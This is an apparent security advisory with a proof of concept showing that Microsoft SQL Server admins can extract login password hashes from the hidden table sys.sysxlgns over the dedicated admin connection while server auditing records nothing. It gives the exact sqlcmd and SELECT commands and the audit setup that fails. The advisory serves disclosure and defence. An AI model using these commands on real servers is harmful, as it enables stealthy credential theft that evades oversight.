Title: Microsoft SQL Server Password Hash Exposure
Product: Database
Manufacturer: Microsoft
Affected Version(s): 2012-2022
Risk Level: Medium
CVE Reference: N/A
Author of Advisory: Emad Al-Mousa
Overview:
SQL Server is a popular database system, and database systems are a vital backbone in IT infrastructure as different types of systems and applications will require back-end data-store (databsae system). Moreover, Password hashes for Local database accounts are restricted in terms of permission access and only system admins/ DBA's can access them. of course, attackers will attempt to access them to crack the hashes and access the database system for data exfiltration.
*****************************************
Vulnerability Details:
The following exploit assumes attacker escalated his permission as admin, and he/she will be able extract the password hashes even though an audit is in-place. So, its an audit by pass vulnerability.
currently, SQL Server password hashes are stored in two tables:
sys.sql_logins ----> visible table and auditing can be configured against it
sys.sysxlgns -----> invisible table and requires special access mode and audit rule is not functional !
*****************************************
Proof of Concept (PoC):
I will simulate a way to extract password hashes in a stealthy way (auditing will not capture it), in the following PoC the account is called dodo:
Accessing windows server as administrator, open CMD session using the following command:
sqlcmd -S localhost\MSSQL2019 -A -E
USE [master]
GO
select name,pwdhash from sys.sysxlgns where name='dodo';
GO
The password hashes for account “dodo” will be displayed.
Let us create an audit rule using this method to capture “select” statements executed against sys.sysxlgns :
I will create a server-level audit to push audit logs as “binary file”:
USE [master]
GO
CREATE SERVER AUDIT [Audit-2020-SYSTEM-TABLE]
TO FILE
( FILEPATH = N’D:\mssq_audit\’
,MAXSIZE = 0 MB
,MAX_ROLLOVER_FILES = 2147483647
,RESERVE_DISK_SPACE = OFF
)
WITH
( QUEUE_DELAY = 1000
,ON_FAILURE = CONTINUE
,AUDIT_GUID = ‘0333dfad-260b-45a4-8302-d7eb94c14cdc’
)
ALTER SERVER AUDIT [Audit-2020-SYSTEM-TABLE] WITH (STATE = ON)
GO
Then, I will define a database level audit under “MASTER” database to audit SELECT statement by any user/account against the system table sys.sysxlgns as follows:
sqlcmd -S localhost\MSSQL2019 -A -E
USE [master]
GO
CREATE DATABASE AUDIT SPECIFICATION [audit-systemtable]
FOR SERVER AUDIT [Audit-2020-SYSTEM-TABLE]
ADD (SELECT ON OBJECT::[sys].[sysxlgns] BY [public])
WITH (STATE = ON)
GO
The audit specification will be successfully created and can be visibly seen in SQL Server management studio.
Now you attempt to execute select statement again:
sqlcmd -S localhost\MSSQL2019 -A -E
USE [master]
GO
select name,pwdhash from sys.sysxlgns where name='dodo';
GO
- checking audit logs.....nothing is recorded !
Conclustion:
Super users and admin accounts must be monitored/audited for real-time monitoring for threat detection, and for future forensic analysis !
*****************************************
- Defensive Techniques:
configure Operating System Security auditing and Monitoring.
Network Segmentation and Firewall.
pro-actively patch your systems and database systems.
*****************************************
References:
https://databasesecurityninja.wordpress.com/2020/06/02/extract-sql-server-database-password-hashes-without-a-trace/
https://learn.microsoft.com/en-us/sql/relational-databases/system-tables/system-base-tables?view=sql-server-ver16